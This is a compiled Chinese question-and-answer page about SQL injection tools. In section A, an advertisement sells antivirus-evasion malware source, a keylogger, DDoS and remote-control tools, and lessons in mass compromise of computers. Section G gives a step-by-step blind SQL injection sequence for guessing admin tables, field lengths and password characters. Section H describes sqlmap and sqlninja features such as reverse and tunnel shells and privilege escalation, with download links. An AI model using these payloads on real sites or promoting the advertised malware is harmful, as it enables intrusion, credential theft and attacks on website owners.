A. SQL注入工具都有哪些
明小子,啊D
穿山甲(牛B)
穿山甲不錯,能注*入*許多種類資料庫。
***********************************************************
【軟體】
過主動和雲查殺的MD5變異程序源碼
遠程式控制制軟體[獨立個人版]
DDOS壓力測試(攻擊個人電腦,網站,伺服器)
驅動鍵盤記錄器[開機到關機-離線記錄-所有鍵盤操作]
網吧破解工具(包括pubwin2009)
注意!!!
拒絕非法業務!非法使用軟體造成的一切後果由使用者承擔!
【技術】
各類遠控使用
免殺技術[內存-主動-雲]
批量抓雞[漏洞溢出,網頁掛馬,埠溢出]
編程學習:易語言木馬編寫[假窗口+內存截取]
網站檢測:SQL注入攻擊,DDOS攻擊
教學方式:
手把手教學
QQ遠程協助操作+教程
問題隨便問,學會為止,不另收-=費!
**暑期優惠+送工具+送空間+送網站webshell**
==連戲扣摳=====①伍②巴溜巴溜巴巴零
***********************************************************
B. SQL自動注入工具好不好
Sql注入測試一定要使用工具。原因一:工作效率;原因二:人工很難構造出覆蓋面廣的盲注入的sql語句。例如當一個查詢的where字句包含了多個參數,or and的關系比較多時,簡單的or 1=1, and 1=2是很難發現注入點的。
Sql注入的工具很多(Top 15 free SQL Injection Scanners),我最近使用的有Sqlmap,SqliX,JbroFuzz,Sql Power Injector, 網站啄木鳥.現將他們的使用方法和比較結果貼於此:
Sqlmap是python開發的SQL注入漏洞測試工具。沒有UI界面的命令行工具。雖說是命令行工具,可他的使用比網站啄木鳥,Sql Power injector 容易多了,並且有很詳細的幫助文檔。從下面2個地址獲得相關程序包:
C. SQL注入命令工具在那裡下載請給我一個好嗎!
學既所得,好好靠自己的努力,會有一天你會成功的
D. 功能強大.操作簡單的SQL注入工具是
最好的sql注入工具就是手動測試.判斷出欄位了解了注入也就可以屏蔽一些字元串了.
E. 誰有SQL注入工具,要沒毒的
推薦使用 啊D SQL注入工具,或者明小子
F. 有哪些mac能用的sql注入軟體
Mac平台哪些SQL 資料庫發工具
要看oracle,sql等發廠商沒發MAC版本由於數WINDOWS版本所估計能直接安裝
要網找MAC版本安裝程序
要MAC系統找找沒模擬或虛擬IBMPC機系統軟體再要軟體安裝面
G. 誰有SQL注入攻擊工具,發給我好嗎,急用,最好是中文版的
直接構造語句不是更簡單、
1.判斷有無注入點
' ; and 1=1 and 1=2
2.猜表: 常見的表:admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判斷是否存在admin這張表
3.猜帳號數目 如果遇到0< 返回正確頁面 1<返回錯誤頁面說明帳號數目就是1個
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4.猜解欄位名稱 在len( ) 括弧裡面加上我們想到的欄位名稱.
and 1=(select count(*) from admin where len(*) >0)--
and 1=(select count(*) from admin where len(用戶欄位名稱name)>0)
and 1=(select count(*) from admin where len(_blank>密碼欄位名稱password)>0)
5.猜解各個欄位的長度 猜解長度就是把>0變換 直到返回正確頁面為止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 錯誤
and 1=(select count(*) from admin where len(name)>5) 正確 長度是6
and 1=(select count(*) from admin where len(name)=6) 正確
and 1=(select count(*) from admin where len(password)>11) 正確
and 1=(select count(*) from admin where len(password)>12) 錯誤 長度是12
and 1=(select count(*) from admin where len(password)=12) 正確
6.猜解字元
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用戶帳號的第一位
and 1= (select count(*) from admin where left(name,2)=ab)---猜解用戶帳號的第二位
就這樣一次加一個字元這樣猜,猜到夠你剛才猜出來的多少位了就對了,帳號就算出來了
and 1=(select top 1 count(*) from Admin where Asc(mid (pass,5,1))=51) --
這個查詢語句可以猜解中文的用戶和_blank>密碼.只要把後面的數字換成中文的ASSIC碼就OK.最後把結果再轉換成字元.
H. SQL注入哪些工具最有效
SQL Power Injector是一款在.Net 1.1中創建的應用程序,可幫助滲透測試人員在網頁上查找和利用SQL注入。
特徵
支持Windows,Unix和Linux操作系統
SQL Server,Oracle,MySQL,Sybase / Adaptive Server和DB2兼容
SSL支持
自動從網頁上的表單或IFrame載入參數(GET或POST)
檢測並瀏覽框架集
自動檢測網站語言的選項
檢測並添加載入頁面進程期間使用的Cookie(Set-Cookie檢測)
自動查找提交頁面,其方法(GET或POST)以不同的顏色顯示
可以直接在Datagrids中創建/修改/刪除載入的字元串和Cookie參數
單個SQL注入
盲目的SQL注入
比較頁面的真實和錯誤響應或cookie中的結果
時間延遲
SQL注入在自定義瀏覽器中的響應
可以使用HTML上下文顏色查看返回頁面的HTML代碼源並在其中搜索
微調參數和cookie注入
可以參數化預期結果的長度和計數以優化應用程序執行SQL注入所用的時間
創建/編輯預設的ASCII字元,以優化盲注SQL請求數/請求速度
多線程(最多可配置50個)
選項可以通過空的評論/ ** /針對IDS或過濾器檢測來替換空間
在發送之前自動編碼特殊字元
自動檢測響應頁面中的預定義SQL錯誤
在響應頁面中自動檢測預定義的單詞或句子
實時結果
將會話保存並載入到XML文件中
自動查找正面答案和負面答案頁面之間差異的功能
可以創建一個范圍列表,它將替換隱藏的SQL注入字元串中的變數(>)並自動為您播放它們
使用文本文件中的預定義列表自動重播變數范圍
Firefox插件,它將啟動SQL Power Injector以及當前網頁的所有信息及其會話上下文(參數和cookie)
兩個集成工具:Hex和Char編碼器和MS SQL @options解釋器
可以編輯Referer
可以選擇一個用戶代理(或者甚至在用戶代理XML文件中創建一個)
可以使用設置窗口配置應用程序
支持可配置的代理
軟體截圖
地址:http://www.sqlpowerinjector.com/index.htm
ilo--,Reversing.org - sqlbftools
地址:https://packetstormsecurity.com/files/download/43795/sqlbftools-1.2.tar.gz
Bernardo Damele AG:sqlmap,自動SQL注入工具
介紹
sqlmap是一款開源滲透測試工具,可自動檢測和利用SQL注入漏洞並接管資料庫伺服器。它具有強大的檢測引擎,針對終極滲透測試人員的眾多特性,以及從資料庫指紋識別,從資料庫獲取數據,到訪問底層文件系統以及在操作系統上執行命令的各種開關,帶外連接。
特徵
完全支持MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP MaxDB,HSQLDB和Informix資料庫管理系統。
完全支持六種SQL注入技術:基於布爾的盲,基於時間的盲,基於錯誤,基於UNION查詢,堆棧查詢和帶外。
支持直接連接資料庫而不通過SQL注入,通過提供DBMS憑證,IP地址,埠和資料庫名稱。
支持枚舉用戶,密碼哈希,特權,角色,資料庫,表和列。
自動識別密碼哈希格式並支持使用基於字典的攻擊對其進行破解。
支持完全轉儲資料庫表,根據用戶的選擇提供一系列條目或特定列。用戶也可以選擇僅轉儲每列條目中的一系列字元。
支持搜索特定的資料庫名稱,跨所有資料庫的特定表或所有資料庫表的特定列。例如,這對於識別包含自定義應用程序憑證的表格非常有用,其中相關列的名稱包含名稱和傳遞等字元串。
當資料庫軟體是MySQL,PostgreSQL或Microsoft SQL Server時,支持從資料庫伺服器底層文件系統下載和上載任何文件。
當資料庫軟體是MySQL,PostgreSQL或Microsoft SQL Server時,支持執行任意命令並在資料庫伺服器底層操作系統上檢索它們的標准輸出。
支持在攻擊者機器和資料庫伺服器底層操作系統之間建立帶外狀態TCP連接。該通道可以是互動式命令提示符,Meterpreter會話或圖形用戶界面(VNC)會話,可以根據用戶的選擇進行選擇。
通過Metasploit的Meterpreter 命令支持資料庫進程'用戶許可權升級
地址:http://sqlmap.org/
icesurfer:SQL Server接管工具 - sqlninja
介紹
喜歡從Microsoft SQL Server上的SQL注入到資料庫上的完整GUI訪問?採用一些新的SQL注入技巧,在注冊表中添加幾個遠程鏡頭以禁用數據執行保護,混合一個自動生成調試腳本的小Perl,將所有這些放在一個帶有Metasploit包裝器的振動器中,只有sqlninja的攻擊模塊之一!
Sqlninja是一款旨在利用以Microsoft SQL Server作為後端的Web應用程序中的SQL注入漏洞的工具。
其主要目標是在易受攻擊的資料庫伺服器上提供遠程訪問,即使在非常惡劣的環境中也是如此。滲透測試人員應該使用它來幫助和自動化發現SQL注入漏洞時接管資料庫伺服器的過程。
特徵
完整的文檔可以在tarball中找到,也可以在這里找到,但是這里列出了忍者的功能:
遠程SQL Server的指紋(版本,執行查詢的用戶,用戶許可權,xp_cmdshell可用性,資料庫身份驗證模式)
數據提取,基於時間或通過DNS隧道
與Metasploit3集成,通過VNC伺服器注入獲得對遠程資料庫伺服器的圖形化訪問,或者僅上傳Meterpreter
通過vbscript或debug.exe僅上傳可執行的HTTP請求(不需要FTP / TFTP)
直接和反向綁定,TCP和UDP
當沒有可用於直接/反向外殼的TCP / UDP埠時,DNS隧道偽外殼,但資料庫伺服器可以解析外部主機名
ICMP隧道外殼,當沒有TCP / UDP埠可用於直接/反向外殼,但資料庫可以Ping您的盒子
蠻力的'sa'密碼(2種口味:基於字典和增量)
如果找到'sa'密碼,許可權將升級到系統管理員組
創建自定義的xp_cmdshell,如果原始的已被刪除
TCP / UDP埠可以從目標SQL Server掃描到攻擊機器,以便找到目標網路防火牆允許的埠並將其用於反向shell
迴避技術混淆了一些IDS / IPS / WAF
與churrasco.exe集成,通過令牌綁架將許可權升級到w2k3上的SYSTEM
支持CVE-2010-0232,將sqlservr.exe的許可權升級到SYSTEM
地址:https://sourceforge.net/projects/sqlninja/files/sqlninja/sqlninja-0.2.999-alpha1.tgz/download
I. 公認最好的SQL注入掃描工具是哪個
世界上公認最好的SQL掃描器是「自己」,因為人類的大腦是最聰明的,這是笑話,轉入正題: 真的「自己」是最好的掃描器,SQL注入通常都是那幾種,只要自己測試一下(在URL參數的字元後加單引號(雙引號不用);在參數後加 and 1=2;在參數後加and 1=1),這三種方法(前兩者顯示正常沒有SQL注入漏洞,第三者顯示正常但前兩者不正常則有SQL注入漏洞)就可以證實有沒有SQL漏洞了,你還可以在PHP文件中查看有沒有用mysql_real_escape_string等過濾函數,用了這種函數,基本上不會存在SQL注入漏洞。
J. 什麼事SQL注入工具
SQL注入是程序代碼編寫失誤造成的,由於程序員的疏忽導致程序向資料庫提交執行SQL語句的時候,攻擊者可以構造准備好的SQL語句從未被資料庫執行,例如一程序string
sql="select
*
from
admin
where
name='"+name+"'
and
pwd='"+pwd+"'";那麼這句話
很可能被人利用變成"select
*
from
admin
where
name='admin'
and
pwd=''
and
1=1";這樣就有可能繞過登陸的密碼驗證了。
所以
根據這個原理,你的QQ是不可能通過這個方法被盜取的,還是先查毒吧。